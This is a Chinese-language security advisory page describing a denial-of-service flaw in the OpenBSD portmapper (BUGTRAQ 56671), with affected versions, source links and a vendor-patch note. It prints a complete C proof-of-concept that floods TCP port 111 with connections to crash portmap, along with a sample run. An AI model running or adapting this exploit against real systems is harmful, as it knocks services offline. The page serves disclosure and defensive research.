发布日期:2012-11-22
更新日期:2012-11-28受影响系统:
OpenBSD OpenBSD 5.2
OpenBSD OpenBSD 5.1
OpenBSD OpenBSD 4.6
OpenBSD OpenBSD 4.5
OpenBSD OpenBSD 4.4
OpenBSD OpenBSD 4.3
OpenBSD OpenBSD 4.2
OpenBSD OpenBSD 4.1
OpenBSD OpenBSD 4.0 Stable
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56671OpenBSD是一款开源Unix类操作系统。OpenBSD v5.2之前版本在处理多个RPC请求时存在错误,通过向TCP端口111发送特制的报文,可导致端口映射程序崩溃。TCP111端口在默认情况下未开启,要利用此漏洞需要启用端口映射。<*来源:auto236751
链接:http://www.securelist.com/en/advisories/51299
http://archives.neohapsis.com/archives/fulldisclosure/2012-11/0169.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!/*
* authors: 22733db72ab3ed94b5f8a1ffcde850251fe6f466
* 6e2d3d47576f746e9e65cb4d7f3aaa1519971189
* c8e74ebd8392fda4788179f9a02bb49337638e7b
*
* greetz: 43c86fd24bd63b100891ec4b861665e97230d6cf
* e4c0f3f28cf322779375b71f1c14d6f8308f789d
* 691cb088c45ec9e31823ca7ab0da8b4cf8079baf
* b234a149e7ef00abc0f2ec7e6cf535ef4872eabc
*
*
* -bash-4.2$ uname -a
* OpenBSD obsd.my.domain 5.1 GENERIC#160 i386
* -bash-4.2$ id
* uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
* -bash-4.2$ netstat -an -f inet | grep 111
* tcp 0 0 127.0.0.1.111 *.* LISTEN
* tcp 0 0 *.111 *.* LISTEN
* udp 0 0 127.0.0.1.111 *.*
* udp 0 0 *.111 *.*
* -bash-4.2$ gcc openbsd_libc_portmap.c
* -bash-4.2$ ./a.out
* [+] This code doesn"t deserve 1337 status output.
* [+] Trying to crash portmap on 127.0.0.1:111
* [+] 127.0.0.1:111 is now down.
*
*/#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>#define HOST "127.0.0.1"
#define PORT 111
#define LOOP 0x100
int main(void)
{
int s, i;
struct sockaddr_in saddr; printf("[+] This code doesn"t deserve 1337 status output.
");
printf("[+] Trying to crash portmap on %s:%d
", HOST, PORT); saddr.sin_family = AF_INET;
saddr.sin_port = htons(PORT);
saddr.sin_addr.s_addr = inet_addr(HOST); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)) == -1) {
printf("[-] %s:%d is already down.
", HOST, PORT);
return EXIT_FAILURE;
} /* # of iteration needed varies but starts working for > 0x30 */
for(i=0; i < LOOP; ++i) {
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in));
send(s, "8========@", 10, 0);
} if(connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)) == -1)
printf("[+] %s:%d is now down.
", HOST, PORT);
else
printf("[-] %s:%d is still listening. Try to increase loop iterations...
"); return EXIT_SUCCESS;
}建议:
--------------------------------------------------------------------------------
厂商补丁:OpenBSD
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.openbsd.org/security.htmlWebsense代理过滤器安全绕过漏洞Twitter for iPhone中间人攻击安全漏洞相关资讯 OpenBSD 拒绝服务漏洞 OpenBSD安全漏洞
- OpenBSD 6.0将移除Linux子系统以改 (07月26日)
- OpenBSD 将迎来原生的 Hypervisor (09/09/2015 08:07:11)
- 微软因“重大捐款”收到OpenBSD的 (07/09/2015 17:43:26)
| - OpenBSD上的服务管理程序rcctl (12/04/2015 10:39:22)
- OpenBSD 5.8 发布预览,计划10月18 (08/20/2015 10:58:38)
- OpenBSD 5.7 发布,类 Unix 操作系 (05/01/2015 16:49:09)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
易网时代-编程资源站